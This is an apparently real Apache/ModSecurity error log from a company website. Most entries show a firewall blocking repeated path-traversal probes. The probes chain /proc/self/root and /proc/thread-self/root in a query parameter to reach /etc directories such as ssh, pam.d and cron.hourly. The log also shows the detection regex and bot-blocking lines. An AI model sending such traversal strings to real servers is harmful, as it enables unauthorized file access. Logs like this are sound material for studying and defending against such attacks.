https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:09:20.734982 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.241.31:43148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmm4K4xEDsg_V3ESNZYrAAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:09:24.087076 2026] [:error] [pid 2598:tid 140411616036608] [client 74.7.241.31:60836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmm5Bj0p0SRWAqcjGGG1AAAAw8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:09:27.137405 2026] [proxy_fcgi:error] [pid 2473:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:40384] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:09:29.739980 2026] [:error] [pid 6296:tid 140411708356352] [client 74.7.228.61:45608] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmm6XIk7brgkOH-rIWY9QAAAUQ"]
[Tue Mar 17 16:09:49.045879 2026] [proxy_fcgi:error] [pid 9299:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41176] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:09:51.879061 2026] [access_compat:error] [pid 6296:tid 140411649607424] [client 66.249.74.169:35633] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/buy.php
[Tue Mar 17 16:09:58.330130 2026] [:error] [pid 6296:tid 140411741927168] [client 74.7.241.31:60852] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmnBnIk7brgkOH-rIWZEgAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:10:01.096736 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.31:35342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmnCQeiSKl8TjouI-YlOAAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:10:09.423501 2026] [:error] [pid 25836:tid 140411708356352] [client 74.7.241.31:35354] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmnEYh-PF_25v4hFRB4KgAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:10:11.121823 2026] [proxy_fcgi:error] [pid 2473:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41914] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:10:32.137800 2026] [proxy_fcgi:error] [pid 2598:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42848] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:10:54.185822 2026] [proxy_fcgi:error] [pid 18380:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:43878] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:11:16.149794 2026] [proxy_fcgi:error] [pid 9299:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45066] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:11:34.778731 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.241.31:55442] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmnZvPqhzTj3BvfDX-VDAAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:11:37.069821 2026] [proxy_fcgi:error] [pid 9299:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45844] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:11:44.131960 2026] [:error] [pid 17965:tid 140411548894976] [client 74.7.241.31:43534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmncKt8Nd0UC_OcbVHWwgAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:11:58.135151 2026] [proxy_fcgi:error] [pid 25581:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46304] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:12:09.408483 2026] [:error] [pid 25048:tid 140411548894976] [client 74.7.241.31:43550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmniXXXq9-mGshjHG3OEgAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:12:19.129995 2026] [proxy_fcgi:error] [pid 7004:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46790] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:12:41.673796 2026] [proxy_fcgi:error] [pid 2598:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47424] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:13:04.153808 2026] [proxy_fcgi:error] [pid 18380:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48150] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:13:07.287413 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:36790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmnw9Y0UrI5A3LftIwKsQAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:13:09.114767 2026] [:error] [pid 18380:tid 140411548894976] [client 74.7.241.31:38236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmnxa4xEDsg_V3ESNZYxQAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:13:22.968469 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.241.31:38238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmn0qBJNF7axNlVR0Ul3gAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:13:25.117830 2026] [proxy_fcgi:error] [pid 7004:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48868] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:13:31.175088 2026] [:error] [pid 17965:tid 140411548894976] [client 74.7.241.31:41678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmn26t8Nd0UC_OcbVHW5AAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:13:35.387128 2026] [:error] [pid 25048:tid 140411582465792] [client 74.7.241.31:55356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmn3HXXq9-mGshjHG3OGgAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:13:46.033864 2026] [proxy_fcgi:error] [pid 18380:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:49566] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:13:49.387703 2026] [:error] [pid 7004:tid 140411708356352] [client 74.7.241.31:49912] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmn7cU6Sx0TG1YjmQi8JwAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:13:55.124421 2026] [:error] [pid 2598:tid 140411607643904] [client 74.7.244.43:34610] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmn8xj0p0SRWAqcjGGHCwAAAxA"]
[Tue Mar 17 16:13:59.966455 2026] [access_compat:error] [pid 6296:tid 140411725141760] [client 216.73.216.191:51704] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Tue Mar 17 16:14:08.069830 2026] [proxy_fcgi:error] [pid 17965:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:50200] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:14:18.670695 2026] [:error] [pid 29151:tid 140411641214720] [client 74.7.241.31:54156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmoCvPqhzTj3BvfDX-VPQAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:14:28.189862 2026] [:error] [pid 29151:tid 140411716749056] [client 74.7.241.31:36552] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmoFPPqhzTj3BvfDX-VSwAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:14:29.898408 2026] [:error] [pid 29151:tid 140411691570944] [client 74.7.228.61:41426] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmoFfPqhzTj3BvfDX-VTQAAAcY"]
[Tue Mar 17 16:14:30.121801 2026] [proxy_fcgi:error] [pid 6296:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50642] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:14:31.099467 2026] [:error] [pid 7004:tid 140411540502272] [client 74.7.241.31:53608] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmoF8U6Sx0TG1YjmQi8LwAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:14:52.125817 2026] [proxy_fcgi:error] [pid 6296:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51022] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:15:13.129828 2026] [proxy_fcgi:error] [pid 25048:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51450] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:15:35.169817 2026] [proxy_fcgi:error] [pid 6296:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51908] AH01075: Error dispatching request to : (polling)
